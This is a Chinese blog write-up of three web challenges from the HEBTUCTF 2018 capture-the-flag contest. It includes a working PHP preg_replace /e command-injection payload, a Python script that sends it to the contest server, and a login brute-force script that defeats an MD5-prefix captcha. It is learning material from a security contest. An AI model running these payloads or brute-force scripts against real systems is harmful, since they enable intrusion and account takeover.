18-HEBTUCTF-WP

2018-11-19

简介：HEBTUCTF，周六忙校创去了，就做了两三个小时，大部分都是简单题(适合目前的我)

WEB

2048

一道玩游戏的题目，分数达到要求就会给出flag，思路便是修改JS代码后在控制台中运行

图一：

先从中找到代码，发现INIT()函数中有score变量，将JS页面下载下来后进行修改

图二：

然后将代码放在控制台中运行即可

命令执行

漏洞是preg_replace函数

preg_replace(“/123(.+?)123/ies”, ‘text(“\1”)’, $_POST[‘h’]);

执行一个正则表达式的搜索和替换，返回值根据source有所不同，通常情况下为字符串数组或字符串

脚本

import requests
url='http://47.94.129.246:2280/'

payload=""
cmd="dir"
for x in cmd:
    payload+="chr({}).".format(ord(x)) //ord()函数返回对应字符的ASCII码值
print(payload[:-1])  

data={'h':'''123${system(dir)}123'''} //直接使用dir也是可以的
res=requests.post(url,data)
print(res.content)

baopo

爆破密码，有验证码，需要写脚本跑

这里引用大佬的脚本，学习下python网络编程

#encoding=utf8
import requests
import hashlib
import re
def cat(sec):
    i=0
    while(1):
        hash_md5 = hashlib.md5(str(i)) 
        res=hash_md5.hexdigest()
        if res[0:5]==sec:
            break
        i+=1
    return i
def burp(passwd):
    print "start"
    patten=r'===[0-9,a-f]{5}'
    pay='http://47.94.129.246:2132/baopo/index.php'
    cookies={'PHPSESSID':'90q1aobl92srocmarirp41t152'}
    now=passwd
    while(now<passwd+899):
        res=requests.get(pay,cookies=cookies)
        #print res.text
        res=re.search(patten,res.text)
        code=cat(res.group(0)[3:])
        fix=pay+"?username=admin&password={}&randcode={}".format(str(now),str(code))
        #print "Pass:"+str(now)+":"+fix
        res=requests.get(url=fix,cookies=cookies)
        #print res.content
        if("密码错误" in res.content):
            wr.append(now)
            now+=1
        elif("<h3>验证码错误</h3>" in res.content):
            pass
        else:
            print res.content
            break
        print wr
    return now

wr=[]
burp(100)

to be continue